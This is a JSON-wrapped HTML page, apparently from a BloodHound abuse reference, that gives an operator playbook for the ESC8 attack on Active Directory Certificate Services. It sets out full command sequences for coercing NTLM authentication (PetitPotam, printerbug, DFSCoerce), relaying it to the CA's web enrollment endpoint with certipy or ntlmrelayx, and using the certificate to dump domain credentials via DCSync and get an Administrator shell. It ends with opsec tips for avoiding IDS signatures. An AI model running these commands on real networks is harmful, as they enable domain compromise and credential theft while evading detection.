{"title": "ADCSESC8", "source": "bloodhound", "source_label": "BloodHound", "path": "edges/ADCSESC8", "html": "<h1 id=\"adcsesc8\">ADCSESC8</h1>\n<blockquote>\n<p>ESC8: NTLM relay to AD CS HTTP enrollment endpoint — coerce a machine account's NTLM authentication, relay it to the CA's web enrollment interface, and obtain a certificate for that machine account.</p>\n</blockquote>\n<p><strong>Applies to</strong>: Network position to NTLM-relay → AD CS web enrollment (HTTP) endpoint (<code>/certsrv/</code>); no enrollment rights required on attacker account</p>\n<hr>\n<h2 id=\"linux-abuse\">Linux Abuse</h2>\n<h3 id=\"certipy-ad-relay-simplest-handles-everything\">certipy-ad relay (simplest — handles everything)</h3>\n<div class=\"highlight\"><pre><span></span><code><span class=\"c1\"># Terminal 1: Start relay listener</span>\ncertipy-ad<span class=\"w\"> </span>relay<span class=\"w\"> </span>-ca<span class=\"w\"> </span>&lt;ca-host&gt;<span class=\"w\"> </span>-template<span class=\"w\"> </span><span class=\"s1\">&#39;&lt;template&gt;&#39;</span>\n<span class=\"c1\"># Default template: Machine (for computer accounts), use DomainController for DCs</span>\n\n<span class=\"c1\"># Terminal 2: Coerce NTLM auth from target machine</span>\n<span class=\"c1\"># Option A — PetitPotam (unauthenticated in older Windows)</span>\npython3<span class=\"w\"> </span>PetitPotam.py<span class=\"w\"> </span>&lt;attacker-ip&gt;<span class=\"w\"> </span>&lt;target-host&gt;\n\n<span class=\"c1\"># Option B — printerbug / SpoolSample</span>\npython3<span class=\"w\"> </span>printerbug.py<span class=\"w\"> </span><span class=\"s1\">&#39;&lt;domain&gt;/&lt;username&gt;:&lt;password&gt;@&lt;target-host&gt;&#39;</span><span class=\"w\"> </span>&lt;attacker-ip&gt;\n\n<span class=\"c1\"># Option C — DFSCoerce</span>\npython3<span class=\"w\"> </span>DFSCoerce.py<span class=\"w\"> </span>-u<span class=\"w\"> </span><span class=\"s1\">&#39;&lt;username&gt;&#39;</span><span class=\"w\"> </span>-p<span class=\"w\"> </span><span class=\"s1\">&#39;&lt;password&gt;&#39;</span><span class=\"w\"> </span>-d<span class=\"w\"> </span><span class=\"s1\">&#39;&lt;domain&gt;&#39;</span><span class=\"w\"> </span>&lt;attacker-ip&gt;<span class=\"w\"> </span>&lt;target-host&gt;\n\n<span class=\"c1\"># Certipy relay outputs: &lt;target-computer&gt;.pfx</span>\n\n<span class=\"c1\"># Authenticate with obtained machine cert</span>\ncertipy-ad<span class=\"w\"> </span>auth<span class=\"w\"> </span>-pfx<span class=\"w\"> </span>&lt;target-computer&gt;.pfx<span class=\"w\"> </span>-dc-ip<span class=\"w\"> </span>&lt;dc-ip&gt;\n<span class=\"c1\"># Returns: machine account NT hash + TGT</span>\n\n<span class=\"c1\"># If targeting DC: perform secretsdump with machine account hash</span>\nsecretsdump.py<span class=\"w\"> </span>-hashes<span class=\"w\"> </span><span class=\"s1\">&#39;:&lt;ntlm-hash&gt;&#39;</span><span class=\"w\"> </span><span class=\"s1\">&#39;&lt;domain&gt;/&lt;target-computer&gt;$@&lt;dc-ip&gt;&#39;</span>\n</code></pre></div>\n<h3 id=\"ntlmrelayx-alternative-more-control\">ntlmrelayx (alternative — more control)</h3>\n<div class=\"highlight\"><pre><span></span><code><span class=\"c1\"># Terminal 1: Start ntlmrelayx targeting CA web enrollment</span>\nntlmrelayx.py<span class=\"w\"> </span>-t<span class=\"w\"> </span><span class=\"s2\">&quot;http://&lt;ca-host&gt;/certsrv/certfnsh.asp&quot;</span><span class=\"w\"> </span><span class=\"se\">\\</span>\n<span class=\"w\">  </span>--adcs<span class=\"w\"> </span>--template<span class=\"w\"> </span><span class=\"s1\">&#39;&lt;template&gt;&#39;</span><span class=\"w\"> </span>-smb2support\n\n<span class=\"c1\"># Terminal 2: Coerce NTLM auth from target</span>\npython3<span class=\"w\"> </span>PetitPotam.py<span class=\"w\"> </span>&lt;attacker-ip&gt;<span class=\"w\"> </span>&lt;target-host&gt;\n<span class=\"c1\"># ntlmrelayx outputs base64-encoded PFX</span>\n\n<span class=\"c1\"># Decode and save PFX</span>\n<span class=\"nb\">echo</span><span class=\"w\"> </span><span class=\"s1\">&#39;&lt;base64-pfx&gt;&#39;</span><span class=\"w\"> </span><span class=\"p\">|</span><span class=\"w\"> </span>base64<span class=\"w\"> </span>-d<span class=\"w\"> </span>&gt;<span class=\"w\"> </span>&lt;target-computer&gt;.pfx\n\n<span class=\"c1\"># Authenticate</span>\ncertipy-ad<span class=\"w\"> </span>auth<span class=\"w\"> </span>-pfx<span class=\"w\"> </span>&lt;target-computer&gt;.pfx<span class=\"w\"> </span>-dc-ip<span class=\"w\"> </span>&lt;dc-ip&gt;\n\n<span class=\"c1\"># Or use Rubeus (pass to Windows)</span>\n<span class=\"c1\"># Rubeus.exe asktgt /user:&lt;target-computer&gt;$ /certificate:&lt;pfx-base64&gt; /ptt</span>\n</code></pre></div>\n<h3 id=\"post-cert-dc-machine-account-dcsync\">Post-cert — DC machine account → DCSync</h3>\n<div class=\"highlight\"><pre><span></span><code><span class=\"c1\"># Got DC machine account hash — perform DCSync</span>\nsecretsdump.py<span class=\"w\"> </span>-hashes<span class=\"w\"> </span><span class=\"s1\">&#39;:&lt;ntlm-hash&gt;&#39;</span><span class=\"w\"> </span><span class=\"s1\">&#39;&lt;domain&gt;/&lt;dc-name&gt;$@&lt;dc-ip&gt;&#39;</span>\n\n<span class=\"c1\"># Or use S4U2Self RBCD / pass-the-hash for shells</span>\ngetST.py<span class=\"w\"> </span>-spn<span class=\"w\"> </span><span class=\"s1\">&#39;cifs/&lt;dc-host&gt;&#39;</span><span class=\"w\"> </span>-hashes<span class=\"w\"> </span><span class=\"s1\">&#39;:&lt;ntlm-hash&gt;&#39;</span><span class=\"w\"> </span><span class=\"s1\">&#39;&lt;domain&gt;/&lt;dc-name&gt;$&#39;</span>\n<span class=\"nb\">export</span><span class=\"w\"> </span><span class=\"nv\">KRB5CCNAME</span><span class=\"o\">=</span>Administrator.ccache\nwmiexec.py<span class=\"w\"> </span>-k<span class=\"w\"> </span>-no-pass<span class=\"w\"> </span><span class=\"s1\">&#39;&lt;domain&gt;/Administrator@&lt;dc-host&gt;&#39;</span>\n</code></pre></div>\n<hr>\n<h2 id=\"windows-abuse\">Windows Abuse</h2>\n<h3 id=\"certifyexe-coercion-ntlmrelayx\">Certify.exe coercion + ntlmrelayx</h3>\n<div class=\"highlight\"><pre><span></span><code># Terminal 1 (Linux attacker): Start relay\nntlmrelayx.py -t &quot;http://&lt;ca-host&gt;/certsrv/certfnsh.asp&quot; --adcs --template Machine\n\n# Terminal 2 (Windows): Coerce auth from target\nCertify.exe coerceauth /ca:&lt;ca-host&gt;\\&lt;ca&gt; /target:&lt;attacker-ip&gt;\n# Or: SpoolSample.exe &lt;victim-host&gt; &lt;attacker-ip&gt;\n</code></pre></div>\n<hr>\n<h2 id=\"requirements-checklist\">Requirements Checklist</h2>\n<ul>\n<li>[ ] AD CS web enrollment enabled (<code>/certsrv/</code> responding on HTTP/HTTPS)</li>\n<li>[ ] HTTPS NOT required for enrollment (HTTP accepted) — check if HTTPS is enforced; if so, relay needs HTTPS support</li>\n<li>[ ] Target machine can be coerced (SpoolSvc running, or PetitPotam applicable)</li>\n<li>[ ] Template allows machine/computer enrollment (e.g., Machine, DomainController)</li>\n</ul>\n<hr>\n<h2 id=\"opsec\">Opsec</h2>\n<ul>\n<li>HTTP enrollment events logged on the CA (IIS logs + CA audit log).</li>\n<li>Coercion attempts generate Event ID 4624 (logon) on the coerced machine.</li>\n<li>PetitPotam may trigger IDS signatures — use less-signatured coercion methods (DFSCoerce, PrinterBug) where possible.</li>\n<li>The issued cert appears in CA's Issued Certificates store attributed to the relayed machine identity.</li>\n</ul>", "excerpt": "ADCSESC8 ESC8: NTLM relay to AD CS HTTP enrollment endpoint — coerce a machine account's NTLM authentication, relay it to the CA's web enrollment interface, and obtain a certificate for that machine account. Applies to : Network position to…", "tags": []}